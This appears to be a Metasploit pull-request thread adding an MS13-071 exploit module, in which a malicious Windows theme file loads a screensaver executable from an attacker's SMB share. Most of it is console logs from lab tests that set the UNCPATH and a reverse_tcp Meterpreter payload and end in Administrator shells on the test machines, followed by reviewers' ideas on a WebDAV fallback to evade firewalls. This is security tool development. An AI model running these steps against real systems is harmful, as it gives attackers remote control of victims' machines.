Add module for MS13-071

[jvazquez-r7]

Yup exploit for MS13-071, in order to trigger the user should open the malicious msf.theme file, and check the Screen Saver tab.

It has been tested on XP SP3 and 2003 SP2 successfully. (Bug related to XP and 2003).

The vulnerability, basically is due to the handling of the screenserver, an arbitrary path can be used, including remote SMB paths. Since an screenserver is just an exe, gameover.

The most interesting about the module is that it's including the SMBServer mixin, and implementing the routines to provide the screen server file! It's the first step towards a mixin which provides a SMB (anonymous) share and configure the files to provide. So in the future the SMB code should be moved to a mixin, but atm, since it's early code, I feel more comfortable with just adding some code to the module, so people can test, fill bugs if it isn't working in any environment, etc. Also, I get a first code review :) So yup, just explaining why it's not in a mixin atm.

The module has two modes:

• An external SMB server is provided, and the UNCPATH option is used to point to the malicious SMB server and resource (the resource is just the payload embedded into an exe):

msf exploit(ms13_071_theme) > set UNCPATH \\\\192.168.172.243\\exploit\\exploit.scr
UNCPATH => \\192.168.172.243\exploit\exploit.scr
msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Remember to share the malicious EXE payload as \\192.168.172.243\exploit\exploit.scr
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
msf exploit(ms13_071_theme) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1668) at 2013-09-18 13:57:25 -0500

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.203 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > exit -y

• Let the module act also as SMB Server.
• Tested with Windows XP SP3 and Windows 2003 SP2 / No domain / workgroup:

msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.172.1\wYNNp\OrvjEg.scr
[*] Server started.
msf exploit(ms13_071_theme) > [*] Sending stage (752128 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50887) at 2013-09-18 11:23:55 -0500
[*] Sending stage (752128 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50888) at 2013-09-18 11:24:08 -0500

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
gmeterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(ms13_071_theme) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms13_071_theme) > 

• Tested with WIN2003SP2 as Domain Controller, Windows XPSP3 joined the domain, then WINXPSP3 with no DOMAIN

msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.172.1\JalVNbsrN\sCOmK.scr
[*] Server started.
msf exploit(ms13_071_theme) > [*] Sending stage (752128 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1637) at 2013-09-18 13:31:27 -0500

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.203 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(ms13_071_theme) > 
[*] Sending stage (752128 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1078) at 2013-09-18 13:36:40 -0500

msf exploit(ms13_071_theme) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms13_071_theme) > 
[*] Sending stage (752128 bytes) to 192.168.172.244
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.244:1089) at 2013-09-18 13:37:59 -0500

msf exploit(ms13_071_theme) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(ms13_071_theme) > 

[Meatballs1]

The SMB Mixin would be a good addition, but... wouldn't this be more of a true 'remote' exploit if it used WEBDAV (port 80) which is more likely to escape a firewall? Windows firewall by default restricts SMB traffic to local subnet.

Infact it would be awesome to have an SMB/WebDAV mixin with an optional, or fallback technique, as windows by default tries \share to 445, then attempts 80 if it cant connect to that.

[jvazquez-r7]

Webdav code is already in lot of modules, but not in mixin. The thing with the webdav is which requires webclient enabled, which is true by default on XP SP3, but not on 2003SP2 or newer versions of windows.

[Meatballs1]

Which is why a WebDAV+SMB Mixin would be so nifty :)

[wchen-r7]

I agree with @Meatballs1, also agree with @jvazquez-r7 that this feature should be implemented in SMBServer mixin in the future. We are behind on SMB support for sure.

[wchen-r7]

Works for me:

msf > use exploit/windows/fileformat/ms13_071_theme 
msf exploit(ms13_071_theme) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/wchen/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\10.0.1.76\GufEfjOiL\qXFObOEP.scr
[*] Server started.
msf exploit(ms13_071_theme) > use exploit/multi/handler 
msf exploit(handler) > run

[-] Handler failed to bind to 10.0.1.76:4444
[*] Started reverse handler on 0.0.0.0:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.0.1.89
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.89:3102) at 2013-09-19 22:20:02 -0500